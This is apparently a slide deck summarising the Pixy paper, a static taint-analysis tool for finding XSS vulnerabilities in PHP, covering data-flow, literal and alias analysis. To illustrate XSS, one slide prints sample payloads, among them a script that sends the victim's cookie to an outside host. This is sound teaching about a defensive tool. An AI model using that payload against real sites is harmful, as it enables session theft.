380 likes | 632 Views
Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities. Nenad Jovanovic, Christopher Kruegel, Engin Kirda Secure Systems Lab Vienna University of Technology Proceedings of the IEEE Symposium on Security and Privacy. (May 2006). Outline. Introduction
E N D
Pixy: A Static Analysis Tool forDetecting Web Application Vulnerabilities Nenad Jovanovic, Christopher Kruegel, Engin Kirda Secure Systems Lab Vienna University of Technology Proceedings of the IEEE Symposium on Security and Privacy. (May 2006)
Outline • Introduction • Taint-Style Vulnerabilities • Data Flow Analysis • Empirical Results • Conclusions • Comments
Introduction(1/2) • There are urgent need for automated vulnerability detection in Web apps development. • The existing approaches for mitigating threats to Web apps can be divided into • client-side and server-side solutions • Server-side solutions: • Static approaches • Scan source code for vulnerabilities • Dynamic approaches • Detect while executing the audited program
Introduction(2/2) • Pixy • The first open source tool for statically detecting XSS vulnerabilities in PHP4 code by means of data flow analysis • It can be applied to other taint-style vulnerabilities such as SQL injection or command injection • http://pixybox.seclab.tuwien.ac.at/pixy/index.php
Taint-Style Vulnerabilities(1/2) • Of all vulnerabilities in Web apps, problem caused by unchecked input are recognized as being the most common • Inject malicious data in Web applications • Manipulate applications using malicious data • The authors refer to this class of vulnerabilities as the tainted object propagation problem • Referenced from “Finding security errors in Java programs with static analysis,. in Proceedings of the 14th UsenixSecurity Symposium, Aug. 2005”
Taint-Style Vulnerabilities(2/2) • Tainted data • Originate from potentially malicious users • Cause security problems at vulnerable points in the program (called sensitive sinks) • May enter the program at specific places, and can spread via assignment and similar constructs • Can be untainted (sanitized) using a set of operations • Many important types of vulnerabilities (e.g., XSS or SQL injection) can be seen as instances of this general class of taint-style vulnerabilities. • Differ only with respect to concrete values of few parameters
Cross-Site Scripting (XSS)(1/2) • Occurs when dynamically generated Web pages display improperly validated input • An attacker may embed malicious JavaScriptcode into dynamically generated pages of trusted sites. • hijack the user account credentials • change user settings • steal cookies • insert unwanted content into the page
Cross-Site Scripting (XSS)(2/2) • Reflected Cross-Site Scripting Attacks • Stored Cross-Site Scripting Attacks • An attacker's malicious script is rendered more than once <script>alert('Hello World');</script> <a href=“/usercp.php?action=logout”>一個關於兔子的網頁</a> <script>location.replace('http://rickspage.com/?secret='+document.cookie)</script>
Properties of XSS • Entry Points into the programs • GET: $_GET • POST: $_POST • COOKIE: $_COOKIE • entry points grows when the “register globals” is active • Sanitation Routines • htmlentities(), htmlspecialchars(), and type casts • Sensitive Sinks • echo() • print() • printf()…
Data Flow Analysis(1/4) • Goal: To determine whether it is possible that tainted data reaches sensitive sinks without being properly sanitized. • Identify the taint value of variables used in these sinks • Statistically compute certain information for every single program point (or for coarser units such as functions) • PHP Front-End • construct a parse tree for PHP input file • transformed into linearized form resembling three-address code(TAC), and kept as a control flow graph for each encounter function • Assembly-like language • At most 3 operands • “x = y op z”
Data Flow Analysis(2/4) • Operates on the control flow graph (CFG) of a program • A data structure built on top of the intermediate code representation abstracting the control flow behavior of a function that is being compiled • Node –atomic statement of program • Edge – flow of control
Literal Analysis: Basics • Purpose: To determine, for each program point, the literal that a variable or a constant can hold. • Can improve the precision of the overall analysis by: • Evaluate branch conditions • Ignore program paths that cannot be executed at runtime (called path pruning) • Resolution of non-literal include statements, variable variables, variable array indices, and variable function calls (only for potential uses) • After performing literal analysis • each CFG node is associated with information about which literal is mapped to a variablebefore executing that node
How Data Flow Analysis is Used to Perform Literal Analysis • Assume a fictitious programming language • One variable (v) • Two literals (the integer 3 and 4) • “skip” node • empty instruction • “Ω” • Unknown literal
Data Flow Analysis(3/4) • Carrier Lattice • Information about program represented using values from algebraic structure • Every information that could ever be associated with a CFG node by the analysis must be contained as an element of the used lattice • Bottom element : “not visited yet” at the biginning • Line: ordering between elements regard to precision • Least upper bound : the smallest element that is greater than or equal to both of the elements. Needed by the analysis algorithm
Data Flow Analysis(4/4) • Transfer Function • f: PP for each node in control flow graph • Input: a lattice element • Output: a lattice element • Models effect of the node on the program information • Each CFG node is associated with such a transfer function
Literal Analysis: Basics • Carrier Lattice Definition • Provides mappings for all variables and constants that appear in the scanned program • Able to describe the mapping to any possible literal (infinite)
Literal Analysis: Basics • Transfer Function Definition • PHP without explicit type declarations “Hidden” array
Four cases in order of increasing complexity 1. Not an array element and not known as array • strong update 2. An array, but not an array element • Array tree 3. Element without non-literal indices (may be an array) • strong overlap
Four cases in order of increasing complexity 4. An array element with non-literal indices and maybe an array • weak overlap algorithm: all overwrite operations are replaced by least upper bound operations • Array elements with one or more non-literal indices are permanently mapped to Ω
Ignoring the information of alias relationships would prevent literal analysis from producing correct results in a number of cases. Without alias analysis, literal analysis can’t decide that $a also affects $b $b remain unchanged and be incorrect! Alias Analysis
Carrier Lattice Definition • Alias group: a group of variables referencing the same memory location • Modeling alias information through sets ofalias group sets • (…): an alias group • {…}: an alias group set • Must-aliasesof a variable • “{(a,b) (c)}” $b: must-alias of $a • May-aliases of a variable • “{(a,b) (c)} {(a,c) (b)}” $b and $c: may-aliases of $a • The order among lattice elements is defined as subset inclusion
Static analysis is not able to decide which path the program will take • Under the assumption that the condition is determined by dynamic factors • Environment variables, user input
Transfer Function Definition • Reference assignment • “$a = & $b” • Unset node • Own one-element alias group for each alias group set • Global node • Equally-name variable from the global scope on the right side • “global $a;” • The authors only consider references to simple variables
Literal Analysis Revisited • Here we only consider references to simple variables • Functions built into PHP are conservatively modeled as returning Ω since the increased precision is expected to be rather small • only built-in function modeled precisely is “define”
Literal Analysis Revisited • The transfer function at the call preparation node stores the alias information for the local variables of the calling function, and resets it to its default (initial) value • On function return (i.e., at the call return node), the alias information for local variables of the callee is reset to its default, while the caller's locals are restored again.
Taint Analysis • Purpose: To determine, for each program point, the taint value (instead of the literal) of a variable or constant. • Possible to inspect whether any sensitive sink in the program is receiving malicious data, and hence, to detect vulnerabilities
Taint Analysis • Carrier Lattice Definition • Tainted: if it can hold a malicious, not yet sanitized (checked) value originating from user input • Not map to Ω but to the tainted valuestaintedand untainted • mapped to tainted: this variable might be tainted. • mapping to untainted: this variable is untainted. • whenever the analysis cannot determine, it is conservatively assumed to be tainted
Taint Analysis • Transfer Functions Definition • Implicitly casting a tainted variable into an integer untaints this variable • (with unary operators such as +, -, and (int)) • Correctly model built-in PHP functions can reduce the number of false positives • Pixy processes a specification file on startup which contains abstracted versions of some built-in functions in PHP syntax • “htmlentities” and “array” return $_UNTAINTED
Taint Analysis • Using the Analysis Results • Generating warnings that point the developer to possible XSS vulnerabilities at the end of the analysis is straightforward. • The analysis information for each sensitive sink is searched for tainted input variables a • A warning message indicating the corresponding line is issued if such a violation is discovered
Limitations • Pixy does not support object-oriented features of PHP. • Malicious data can never arise from such constructs. • Files included with “include” and similar keywords are not scanned automatically • The authors frequently observed false positives stemming from these lacking file inclusions • Eliminated through manual inclusion
Conclusions • A flow-sensitive, interprocedural, and context-sensitive data flow analysis for PHP, targeted at detecting taint-style vulnerabilities • Additional literal analysis and alias analysis to improve correctness and precision of taint analysis • Pixy, an open-source Java tool that implements these analysis technique • Experimental validation of Pixy’s ability to detect unknown vulnerabilities with a low false positive rate
Comments • The first to perform alias analysis for an untyped, reference-based scripting language such as PHP • Beyond the scope of the paper • Recursive calls depends on dynamic information • Infinite call depth for non-terminating programs • The implementation is widely used by the public. • Future work • automatic inclusion of “include” files